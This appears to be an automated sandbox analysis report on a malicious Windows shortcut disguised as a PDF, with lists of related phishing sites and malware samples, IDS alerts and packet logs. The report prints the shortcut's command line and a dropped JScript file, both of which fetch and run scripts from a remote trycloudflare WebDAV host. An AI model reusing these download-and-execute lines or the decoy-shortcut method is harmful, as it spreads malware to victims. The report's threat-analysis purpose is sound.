Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://metamask-io-s--dk.webflow.io	Get hash	malicious	HTMLPhisher	Browse	104.18.161.117
	https://started-ledgger.webflow.io	Get hash	malicious	HTMLPhisher	Browse	172.64.151.8
	https://cuiinbeseprologin.webflow.io	Get hash	malicious	HTMLPhisher	Browse	104.18.161.117
	https://lketamaskloginn.webflow.io	Get hash	malicious	Unknown	Browse	104.18.36.248
	IPt9U27NoX.exe	Get hash	malicious	Unknown	Browse	172.67.191.12
	SecuriteInfo.com.Win32.DropperX-gen.23511.10885.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	https://test.novanotes.de/	Get hash	malicious	Unknown	Browse	104.16.123.96
	http://87558bo.com/	Get hash	malicious	Unknown	Browse	172.67.151.6
	IPt9U27NoX.exe	Get hash	malicious	Unknown	Browse	104.21.84.99
	https://metabussiness-helper-verify24h-now.abaytravel.com/meta-community-standard.php	Get hash	malicious	Unknown	Browse	104.18.11.207

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	https://metabussiness-helper-verify24h-now.abaytravel.com/meta-community-standard.php	Get hash	malicious	Unknown	Browse	104.16.230.132
	https://pub-a75ffa45639b4a91a804d5a002f48c9d.r2.dev/signs.html	Get hash	malicious	HTMLPhisher	Browse	104.16.230.132
	https://allegrolokalnie.pl-745667434.icu/dostawa/pilarka-stihl-ms-362-cm---jak-nowa-970323	Get hash	malicious	HTMLPhisher	Browse	104.16.230.132
	https://mato-vldcmm.click/4	Get hash	malicious	Unknown	Browse	104.16.230.132
	https://at-ts-awesome-site-f89b3f.webflow.io/	Get hash	malicious	Unknown	Browse	104.16.230.132
	https://bnz-danklogin-nz.top/smscode.php/	Get hash	malicious	Unknown	Browse	104.16.230.132
	http://10h-ebhgsyyftygwehbsf78weuygiukhj.vercel.app/case/100081295808699.html	Get hash	malicious	HTMLPhisher	Browse	104.16.230.132
	http://discordcloness.netlify.app/	Get hash	malicious	Unknown	Browse	104.16.230.132
	https://mr.ahmed-elgamal.com/03/?id=0EcoCp6Ari	Get hash	malicious	HTMLPhisher	Browse	104.16.230.132
	http://sg-adh7.vv.885210.xyz/	Get hash	malicious	Unknown	Browse	104.16.230.132
a0e9f5d64349fb13191bc781f81f42e1	Document25.xlsm	Get hash	malicious	ScreenConnect Tool, AsyncRAT, StormKitty, VenomRAT	Browse	104.16.230.132
	Launcher.exe	Get hash	malicious	LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	104.16.230.132
	Galaxy Swapper v2.0.3.exe	Get hash	malicious	LummaC Stealer	Browse	104.16.230.132
	dok PZ 2025-03-11_142242 fin_Orygina#U0142.xls	Get hash	malicious	Unknown	Browse	104.16.230.132
	L0erlgyZ6f.exe	Get hash	malicious	Amadey, LummaC Stealer	Browse	104.16.230.132
	NB NT19901102W.xls	Get hash	malicious	Unknown	Browse	104.16.230.132
	13s1HMkHKv.exe	Get hash	malicious	Amadey, DarkVision Rat, Fallen Miner, LummaC Stealer	Browse	104.16.230.132
	wJWNpO6lcm.exe	Get hash	malicious	Amadey, GCleaner, LummaC Stealer	Browse	104.16.230.132
	NB NT19901102W.xls	Get hash	malicious	Unknown	Browse	104.16.230.132
	SoftWare(1).exe	Get hash	malicious	LummaC Stealer	Browse	104.16.230.132

Process:	C:\Windows\System32\cmd.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	383
Entropy (8bit):	5.037212569625855
Encrypted:	false
SSDEEP:	6:TMVBd/61YOXXCFiEqr1J8GUHnBkJ2IuPJ25KWZ4wH8aemNdMeq:TMHdC1tSoEqr1onGUI8J25KWjH8NCdMp
MD5:	3CF605B4D4423FB6D067B08B293E6861
SHA1:	0A17E4A602B6904FE0995052AF37D76467C4507A
SHA-256:	073F19D6D2B2E9FF75D3B728C71876CCF389B4BDD90510CA5603D0CF075B8B53
SHA-512:	61A1DE07D9579EB8E7192663D1371498C08144D693DA573603F67D742F596B065AB8BF96970E106BE68F91D55EF846E1F051BF55419374B21AAC46DC6A7A3C2C
Malicious:	true
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8"?>..<job>.. <script language="JScript">.. <![CDATA[.. var shell = new ActiveXObject("WScript.Shell");.. try {.. shell.Run("cmd /c \\\\typically-nut-personalized-syndication.trycloudflare.com@SSL\\DavWWWRoot\\xo.bat", 0, false);.. } catch (e) {}.. WScript.Quit();.. .. </script>..</job>

C:\Users\user\Contacts\error_log.txt

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	303
Entropy (8bit):	5.067410774002035
Encrypted:	false
SSDEEP:	6:9im31jywyLVt2RoJakwuKwyaZTFyNuTRoJSFzb7K6TwReQ+g:9DFjUTxaZutya5wu42v7K6Twl+g
MD5:	864B1D7F685E216C09C708E00436E7B6
SHA1:	FF5541B3A762FB1DFADED49D061DC8D36BEDA94E
SHA-256:	C67C48CDC49D2E8428B55A76A75AF7F08EBE53ED6AB199A61CBE1BC2CE7FAF2C
SHA-512:	C22D13FC5CE71C7F0C3BE5E1DE4CC49D9229D90CF957E625335B9B507311047ECF71376DA9BB36AFE616061B613A82B65E0305F1BFD1ADF660432EF3471AF34F
Malicious:	false
Reputation:	low
Preview:	[LOG] Script started at 13/03/2025 6:07:46.00 ..[ERROR] Failed to connect to WebDAV. ..The system cannot find the drive specified...[INFO] Uploading error_log.txt to WebDAV... ..The system cannot find the path specified... 0 file(s) copied...[INFO] Script completed at 13/03/2025 6:07:56.89. ..

Chrome Cache Entry: 60

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	553
Entropy (8bit):	4.662821081936326
Encrypted:	false
SSDEEP:	12:TvgsoCVIogs01lI55aNGlTF5TF5TF5TF5TF5TFK:cEQtnstTPTPTPTPTPTc
MD5:	0127426BF3BA07FF7211399DDF5186C4
SHA1:	221D89F3261F545AC58848EBA300E0134C76FF9A
SHA-256:	982B986BB578E137F062099427A8CAEC3C501C84A9E4B22369EBD2BADEC42FE7
SHA-512:	6CEA4AB7D43A518A316120BF7AE340583E989A21FC3E142DDD71742D53A7AE6CFA276F232ACD6B6794444B28AA9A666C40171EE44341A7B9A3CA8453B61A371A
Malicious:	false
URL:	https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdf
Preview:	<html>..<head><title>403 Forbidden</title></head>..<body>..<center><h1>403 Forbidden</h1></center>..<hr><center>cloudflare</center>..</body>..</html>.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->..

Chrome Cache Entry: 61

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	553
Entropy (8bit):	4.662821081936326
Encrypted:	false
SSDEEP:	12:TvgsoCVIogs01lI55aNGlTF5TF5TF5TF5TF5TFK:cEQtnstTPTPTPTPTPTc
MD5:	0127426BF3BA07FF7211399DDF5186C4
SHA1:	221D89F3261F545AC58848EBA300E0134C76FF9A
SHA-256:	982B986BB578E137F062099427A8CAEC3C501C84A9E4B22369EBD2BADEC42FE7
SHA-512:	6CEA4AB7D43A518A316120BF7AE340583E989A21FC3E142DDD71742D53A7AE6CFA276F232ACD6B6794444B28AA9A666C40171EE44341A7B9A3CA8453B61A371A
Malicious:	false
URL:	https://www.healyconsultants.com/favicon.ico
Preview:	<html>..<head><title>403 Forbidden</title></head>..<body>..<center><h1>403 Forbidden</h1></center>..<hr><center>cloudflare</center>..</body>..</html>.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->..

Static File Info

General

File type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=11, Archive, ctime=Wed Nov 13 02:12:59 2024, mtime=Wed Nov 13 02:12:59 2024, atime=Wed Nov 13 02:12:59 2024, length=331776, window=hidenormalshowminimized
Entropy (8bit):	3.886567282013468
TrID:	Windows Shortcut (20020/1) 100.00%
File name:	DE-10192.pdf.lnk.download.lnk
File size:	3'129 bytes
MD5:	d13c6bf0d56449fd952a8e26bb040fae
SHA1:	ceff34eda87c7d4b9bc002fa600f025d003963b1
SHA256:	27af6b46ac4297ad0921f014d756acb7cdecfd01cc00c746d04ac8855ebe5a99
SHA512:	d5c6ead642a069f758b293714585620dec0255d4a0d66b94efc2aca6a13640c02c6b0acec83106bbdd0673c5cf4c43c9bf22d1c9dc6ffea316673f68904167ee
SSDEEP:	48:8/0mGX0GEyKaAVkPOTOte7dLXuHz7Jk7gF2JqsQ+z0YW+:8/0jdPKa1POTOExuTWsFCqsQ40b+
TLSH:	2651ED0267FD1770F3F25A71197AB6209E37BC52AE51D66E6090828D08A2E14DE28F77
File Content Preview:	L..................F.@.. ....rP.y5..#.R.y5..#.R.y5..........................5....P.O. .:i.....+00.../C:\...................V.1.....QZ....Windows.@........R.@QZ..............................R.W.i.n.d.o.w.s.....Z.1.....QZb...System32..B........R.@QZb.......

File Icon


Icon Hash:	72d282828e8d8dd5

Static Windows Shortcut Info

General
Relative Path:	..\..\..\..\Windows\System32\cmd.exe
Command Line Argument:	/c copy "\\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\coi.wsf" "%TEMP%\coi.wsf" /Y && cscript "%TEMP%\coi.wsf"
Icon location:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-13T11:07:23.516929+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	49681	104.16.230.132	443	TCP
2025-03-13T11:07:24.255409+0100	1810005	Joe Security ANOMALY Microsoft Office WebDAV Discovery	1	192.168.2.10	49681	104.16.230.132	443	TCP
2025-03-13T11:07:30.002555+0100	1810005	Joe Security ANOMALY Microsoft Office WebDAV Discovery	1	192.168.2.10	49682	104.16.230.132	443	TCP
2025-03-13T11:07:43.255450+0100	2030697	ET MALWARE Suspected REDCURL CnC Activity M1	1	192.168.2.10	49694	104.16.230.132	443	TCP
2025-03-13T11:07:49.730564+0100	1810005	Joe Security ANOMALY Microsoft Office WebDAV Discovery	1	192.168.2.10	53106	104.16.230.132	443	TCP
2025-03-13T11:07:54.789267+0100	2030697	ET MALWARE Suspected REDCURL CnC Activity M1	1	192.168.2.10	53124	104.16.230.132	443	TCP
2025-03-13T11:07:57.253235+0100	2030697	ET MALWARE Suspected REDCURL CnC Activity M1	1	192.168.2.10	53131	104.16.230.132	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 13, 2025 11:07:21.798403978 CET	49681	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:21.798453093 CET	443	49681	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:21.798541069 CET	49681	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:21.798861027 CET	49681	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:21.798877001 CET	443	49681	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:23.516784906 CET	443	49681	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:23.516928911 CET	49681	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:23.523899078 CET	49681	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:23.523910999 CET	443	49681	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:23.524214029 CET	443	49681	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:23.529321909 CET	49681	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:23.572323084 CET	443	49681	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:24.255433083 CET	443	49681	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:24.255500078 CET	443	49681	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:24.255633116 CET	49681	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:24.271274090 CET	49681	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:24.271292925 CET	443	49681	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:24.271306992 CET	49681	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:24.271311998 CET	443	49681	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:25.081423044 CET	49677	443	192.168.2.10	2.23.227.208
Mar 13, 2025 11:07:25.081428051 CET	49676	443	192.168.2.10	2.23.227.208
Mar 13, 2025 11:07:25.081666946 CET	49675	443	192.168.2.10	2.23.227.208
Mar 13, 2025 11:07:26.847440958 CET	49672	443	192.168.2.10	204.79.197.203
Mar 13, 2025 11:07:27.159584999 CET	49672	443	192.168.2.10	204.79.197.203
Mar 13, 2025 11:07:27.578893900 CET	49682	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:27.578942060 CET	443	49682	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:27.579035997 CET	49682	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:27.580549002 CET	49682	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:27.580562115 CET	443	49682	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:27.768944025 CET	49672	443	192.168.2.10	204.79.197.203
Mar 13, 2025 11:07:28.972047091 CET	49672	443	192.168.2.10	204.79.197.203
Mar 13, 2025 11:07:29.324729919 CET	443	49682	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:29.324816942 CET	49682	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:29.327188015 CET	49682	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:29.327203989 CET	443	49682	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:29.327450991 CET	443	49682	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:29.378209114 CET	49682	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:29.569730043 CET	49682	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:29.616324902 CET	443	49682	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:30.002571106 CET	443	49682	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:30.007071972 CET	49682	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:30.733082056 CET	49685	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:30.733123064 CET	443	49685	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:30.733181953 CET	49685	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:30.733572960 CET	49685	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:30.733587027 CET	443	49685	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:31.378284931 CET	49672	443	192.168.2.10	204.79.197.203
Mar 13, 2025 11:07:32.490580082 CET	443	49685	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:32.490758896 CET	49685	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:32.492187977 CET	49685	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:32.492198944 CET	443	49685	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:32.492458105 CET	443	49685	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:32.493460894 CET	49685	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:32.536322117 CET	443	49685	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:33.118607044 CET	443	49685	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:33.118675947 CET	443	49685	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:33.118762016 CET	49685	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:33.126187086 CET	49685	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:33.126213074 CET	443	49685	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:33.126230955 CET	49685	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:33.126236916 CET	443	49685	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:33.267008066 CET	49687	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:33.267060995 CET	443	49687	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:33.267251015 CET	49687	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:33.301310062 CET	49687	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:33.301331043 CET	443	49687	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:34.871052027 CET	443	49687	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:34.871617079 CET	49687	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:34.871639967 CET	443	49687	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:34.872441053 CET	49687	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:34.872448921 CET	443	49687	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:35.378699064 CET	49678	443	192.168.2.10	20.189.173.26
Mar 13, 2025 11:07:35.468400002 CET	443	49687	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:35.468477011 CET	443	49687	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:35.468712091 CET	49687	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:35.468883991 CET	49687	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:35.468883991 CET	49687	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:35.468908072 CET	443	49687	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:35.468918085 CET	443	49687	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:35.629753113 CET	49689	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:35.629806995 CET	443	49689	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:35.629870892 CET	49689	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:35.630386114 CET	49689	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:35.630399942 CET	443	49689	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:35.691886902 CET	49678	443	192.168.2.10	20.189.173.26
Mar 13, 2025 11:07:36.190781116 CET	49672	443	192.168.2.10	204.79.197.203
Mar 13, 2025 11:07:36.300182104 CET	49678	443	192.168.2.10	20.189.173.26
Mar 13, 2025 11:07:37.249056101 CET	49674	443	192.168.2.10	2.23.227.208
Mar 13, 2025 11:07:37.249104023 CET	443	49674	2.23.227.208	192.168.2.10
Mar 13, 2025 11:07:37.345988989 CET	443	49689	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:37.346415997 CET	49689	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:37.346441031 CET	443	49689	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:37.347138882 CET	49689	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:37.347146034 CET	443	49689	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:37.503279924 CET	49678	443	192.168.2.10	20.189.173.26
Mar 13, 2025 11:07:37.937571049 CET	443	49689	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:37.937634945 CET	443	49689	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:37.938124895 CET	49689	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:37.938126087 CET	49689	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:37.938214064 CET	49689	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:37.938230038 CET	443	49689	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:37.942109108 CET	49691	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:37.942157984 CET	443	49691	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:37.942279100 CET	49691	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:37.942497969 CET	49691	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:37.942508936 CET	443	49691	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:39.685347080 CET	443	49691	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:39.696032047 CET	49691	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:39.696052074 CET	443	49691	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:39.701850891 CET	49691	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:39.701855898 CET	443	49691	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:39.909528017 CET	49678	443	192.168.2.10	20.189.173.26
Mar 13, 2025 11:07:40.366174936 CET	443	49691	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:40.397727013 CET	443	49691	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:40.397826910 CET	49691	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:40.398226023 CET	49691	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:40.398226976 CET	49691	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:40.398242950 CET	443	49691	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:40.398252964 CET	443	49691	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:40.967727900 CET	49694	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:40.967783928 CET	443	49694	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:40.972990990 CET	49694	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:40.973385096 CET	49694	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:40.973397017 CET	443	49694	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:41.063611984 CET	49695	80	192.168.2.10	172.217.18.99
Mar 13, 2025 11:07:41.068377972 CET	80	49695	172.217.18.99	192.168.2.10
Mar 13, 2025 11:07:41.068608046 CET	49695	80	192.168.2.10	172.217.18.99
Mar 13, 2025 11:07:41.069008112 CET	49695	80	192.168.2.10	172.217.18.99
Mar 13, 2025 11:07:41.073699951 CET	80	49695	172.217.18.99	192.168.2.10
Mar 13, 2025 11:07:41.702347040 CET	80	49695	172.217.18.99	192.168.2.10
Mar 13, 2025 11:07:41.706914902 CET	49695	80	192.168.2.10	172.217.18.99
Mar 13, 2025 11:07:41.711637974 CET	80	49695	172.217.18.99	192.168.2.10
Mar 13, 2025 11:07:41.904344082 CET	80	49695	172.217.18.99	192.168.2.10
Mar 13, 2025 11:07:41.950531006 CET	49695	80	192.168.2.10	172.217.18.99
Mar 13, 2025 11:07:42.676414967 CET	443	49694	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:42.722054005 CET	49694	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:42.741925955 CET	49694	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:42.741941929 CET	443	49694	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:42.745002985 CET	49694	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:42.745007992 CET	443	49694	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:43.255480051 CET	443	49694	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:43.255543947 CET	443	49694	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:43.255598068 CET	49694	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:43.255861044 CET	49694	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:43.255880117 CET	443	49694	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:43.255897045 CET	49694	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:43.255903006 CET	443	49694	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:43.278079033 CET	49698	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:43.278124094 CET	443	49698	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:43.278178930 CET	49698	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:43.278548002 CET	49698	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:43.278558969 CET	443	49698	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:44.151261091 CET	51676	53	192.168.2.10	1.1.1.1
Mar 13, 2025 11:07:44.155989885 CET	53	51676	1.1.1.1	192.168.2.10
Mar 13, 2025 11:07:44.156177998 CET	51676	53	192.168.2.10	1.1.1.1
Mar 13, 2025 11:07:44.160837889 CET	53	51676	1.1.1.1	192.168.2.10
Mar 13, 2025 11:07:44.693368912 CET	51676	53	192.168.2.10	1.1.1.1
Mar 13, 2025 11:07:44.698388100 CET	53	51676	1.1.1.1	192.168.2.10
Mar 13, 2025 11:07:44.698450089 CET	51676	53	192.168.2.10	1.1.1.1
Mar 13, 2025 11:07:44.722138882 CET	49678	443	192.168.2.10	20.189.173.26
Mar 13, 2025 11:07:44.972420931 CET	443	49698	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:44.973277092 CET	49698	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:44.973299026 CET	443	49698	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:44.976104021 CET	49698	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:44.976110935 CET	443	49698	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:45.674963951 CET	443	49698	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:45.675028086 CET	443	49698	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:45.675313950 CET	49698	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:45.675333023 CET	443	49698	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:45.689342976 CET	443	49698	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:45.689434052 CET	443	49698	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:45.689472914 CET	49698	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:45.689483881 CET	443	49698	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:45.689533949 CET	49698	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:45.695976973 CET	443	49698	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:45.702718973 CET	443	49698	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:45.702763081 CET	443	49698	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:45.702824116 CET	49698	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:45.702833891 CET	443	49698	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:45.702874899 CET	49698	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:45.726538897 CET	443	49698	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:45.759475946 CET	443	49698	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:45.759519100 CET	443	49698	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:45.759527922 CET	49698	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:45.759545088 CET	443	49698	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:45.759589911 CET	49698	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:45.759597063 CET	443	49698	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:45.782190084 CET	443	49698	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:45.782224894 CET	443	49698	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:45.782241106 CET	49698	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:45.782258034 CET	443	49698	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:45.782309055 CET	49698	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:45.782351971 CET	443	49698	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:45.787281036 CET	443	49698	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:45.787327051 CET	49698	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:45.787343979 CET	443	49698	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:45.790206909 CET	443	49698	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:45.790239096 CET	443	49698	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:45.790247917 CET	49698	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:45.790261030 CET	443	49698	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:45.790303946 CET	49698	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:45.796591043 CET	443	49698	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:45.800647974 CET	49672	443	192.168.2.10	204.79.197.203
Mar 13, 2025 11:07:45.803260088 CET	443	49698	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:45.803298950 CET	443	49698	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:45.803307056 CET	49698	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:45.803323030 CET	443	49698	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:45.803369045 CET	49698	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:45.803375959 CET	443	49698	104.16.230.132	192.168.2.10
